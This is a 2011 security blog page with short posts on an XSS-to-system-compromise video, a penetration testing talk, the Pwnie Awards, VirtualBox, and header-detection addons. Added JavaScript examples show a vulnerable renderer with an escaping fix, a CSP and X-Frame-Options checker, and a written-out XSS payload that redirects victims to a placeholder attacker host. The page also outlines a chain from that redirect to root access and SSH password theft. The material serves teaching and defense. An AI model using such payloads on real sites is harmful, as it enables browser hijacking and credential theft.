Monday, 25 July 2011
XSS Attack
On Monday, 25 Jul 2011 in topic 'Tutorials'
This video demonstrates how a simple XSS vulnerability can be leveraged to gain complete control of a victim's web browser and eventually lead to a complete system compromise.
1) Use a cross-site scripting vulnerability as the initial attack vector
2) Exploit the XSS by redirecting the user's browser to the Evil_IP with a JavaScript loop (every 2 secs)
3) Exploit the victim's browser to gain a shell on the victim's system
4) Elevate our privileges to system level ('root')
5) Dump the memory contents of an active SSH session and steal the SSH password from the victim's computer
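The injection point that steps 1 and 2 rely on, shown as an added example (this is not code from the video or the original post): a page that reflects a query parameter into HTML unescaped, next to the same page with output encoding applied. The page name, the parameter and the http://Evil_IP/ host are placeholders assumed for the example; the payload is the "redirect every 2 seconds" loop the steps describe.

```javascript
// Added example, not from the original post or the video.
// Assumed: a search page that echoes its query into the HTML; the host
// http://Evil_IP/ is the placeholder used in the steps above.

// Vulnerable: the query lands in the document as raw markup.
function renderSearchVulnerable(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// Fix for an HTML text context: escape the five characters that can
// change the parser state. (Attribute, URL and JS contexts need their own
// encoders; this one is only correct between tags.)
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  }[c]));
}

function renderSearchFixed(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Constructed payload matching step 2: every 2 seconds the browser is sent
// to the attacker's host, which is where the browser exploit would be served.
const PAYLOAD =
  "<script>setInterval(function(){location.href='http://Evil_IP/'},2000)</script>";

// Crude indicator: did a script element survive into the rendered output?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Returns {vulnerable: true, fixed: false} for the payload above.
function demo() {
  return {
    vulnerable: containsScriptTag(renderSearchVulnerable(PAYLOAD)),
    fixed: containsScriptTag(renderSearchFixed(PAYLOAD)),
  };
}

console.log(demo());
```

Run it with node; the escaped version still shows the payload text on the page, but as inert text rather than as a script element, which is the whole difference between step 1 succeeding or not.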
Hacking a security program
On Monday, 25 Jul 2011 in topic 'Tutorials'
This entry is a video talk on the Penetration Testing Execution Standard (PTES). David goes in-depth on the future of penetration testing through PTES and on what it takes to elevate your security posture.
The video is a technical talk that offers direction on where the security industry needs to head. Many of us like to create our own path, but known strategies will not hurt.
LulzSec, Anonymous and Stuxnet Nominated for Pwnie Awards 2011
On Monday, 25 Jul 2011 in topic 'News'
Award categories
In 2011 there will be nine award categories:
Pwnie for Best Server-Side Bug
Pwnie for Best Client-Side Bug
Pwnie for Best Privilege Escalation Bug
Pwnie for Most Innovative Research
Pwnie for Lamest Vendor Response
Pwnie for Best Song
Pwnie for Most Epic FAIL
Pwnie for Lifetime Achievement
Pwnie for Epic Ownage
All the nominations can be read here:
http://pwnies.com/nominations/
VirtualBox 4.1 Final - for Linux
On Monday, 25 Jul 2011 in topic 'Tools'
VirtualBox is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use.
This version is a major update.
Download
http://www.virtualbox.org/wiki/Downloads
Clickjacking Defense - Declarative Sec Detector
On Monday, 25 Jul 2011 in topic 'Pentest'
X-Frame-Options is a response header that restricts whether a web page may be rendered inside a frame. It takes the value DENY or SAMEORIGIN: DENY stops the page from being rendered in any child frame at all, and SAMEORIGIN allows it to be framed only by pages from the same origin, so no third-party site can embed it. This addon scans the HTTP response headers that accompany the web page and raises a notification in the status bar showing whether this declarative clickjacking protection is applied on the respective domain or not.
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/clickjacking-defense-declar/
HTTP Content Security Policy Detector
On Monday, 25 Jul 2011 in topic 'Pentest'
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP is designed to be fully backward compatible; browsers that don't support it still work with servers that implement it, and vice-versa. Browsers that don't support CSP simply ignore it, functioning as usual, defaulting to the standard same-origin policy for web content.
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/http-content-security-polic/
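The check that both detectors above perform, the X-Frame-Options one and the CSP one, written out as an added example (this is not the addons' code). It takes the response headers a browser received, reports which framing restriction applies, and lists the CSP weaknesses a pentester looks for first. Header and directive names are the standard ones; the four sample responses are constructed for the example. It also recognises the CSP frame-ancestors directive, which postdates the 2011 addon but is what a current check should prefer over X-Frame-Options.

```javascript
// Added example, not the addons' own code. Header names, directive names
// and keyword values are standard; the SAMPLES below are constructed.

// Header lookups are case-insensitive, so normalise names once.
function normalizeHeaders(headers) {
  const out = {};
  for (const [k, v] of Object.entries(headers)) out[k.toLowerCase()] = v;
  return out;
}

// Parse "default-src 'self'; script-src 'self' cdn.example" into
// { 'default-src': ["'self'"], 'script-src': ["'self'", 'cdn.example'] }.
function parseCsp(value) {
  const policy = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Clickjacking check: CSP frame-ancestors wins when present, otherwise
// X-Frame-Options DENY / SAMEORIGIN; anything else is reported as such.
function framingProtection(headers) {
  const h = normalizeHeaders(headers);
  const csp = h['content-security-policy'];
  if (csp) {
    const fa = parseCsp(csp)['frame-ancestors'];
    if (fa) return 'csp frame-ancestors ' + fa.join(' ');
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') return 'x-frame-options ' + xfo;
  if (xfo) return 'x-frame-options (unrecognised value: ' + xfo + ')';
  return 'none';
}

// CSP check: presence, then the settings that make it useless against XSS.
function cspFindings(headers) {
  const h = normalizeHeaders(headers);
  const raw = h['content-security-policy'];
  if (!raw) return ['no CSP header'];
  const p = parseCsp(raw);
  const findings = [];
  const scriptSrc = p['script-src'] || p['default-src']; // script-src falls back to default-src
  if (!scriptSrc) {
    findings.push('no script-src or default-src');
  } else {
    if (scriptSrc.includes("'unsafe-inline'")) findings.push("script-src allows 'unsafe-inline'");
    if (scriptSrc.includes("'unsafe-eval'")) findings.push("script-src allows 'unsafe-eval'");
    if (scriptSrc.includes('*')) findings.push('script-src allows *');
  }
  if (!p['object-src'] && !p['default-src']) findings.push('object-src unrestricted');
  return findings.length ? findings : ['no obvious weaknesses'];
}

// Constructed sample responses (header name casing varies on purpose).
const SAMPLES = {
  unprotected: { 'Content-Type': 'text/html' },
  xfoOnly: { 'Content-Type': 'text/html', 'X-Frame-Options': 'SAMEORIGIN' },
  cspStrict: {
    'content-security-policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'",
  },
  cspWeak: {
    'Content-Security-Policy': "default-src *; script-src * 'unsafe-inline'",
  },
};

// One line per sample: what the status-bar notification would say.
function report() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) {
    out[name] = { framing: framingProtection(headers), csp: cspFindings(headers) };
  }
  return out;
}

console.log(JSON.stringify(report(), null, 2));
```

The same functions can be fed real headers from a proxy log or a fetch; the point of the fallback order in framingProtection is that a page carrying both headers is governed by frame-ancestors in browsers that support CSP Level 2, so that is the value to report.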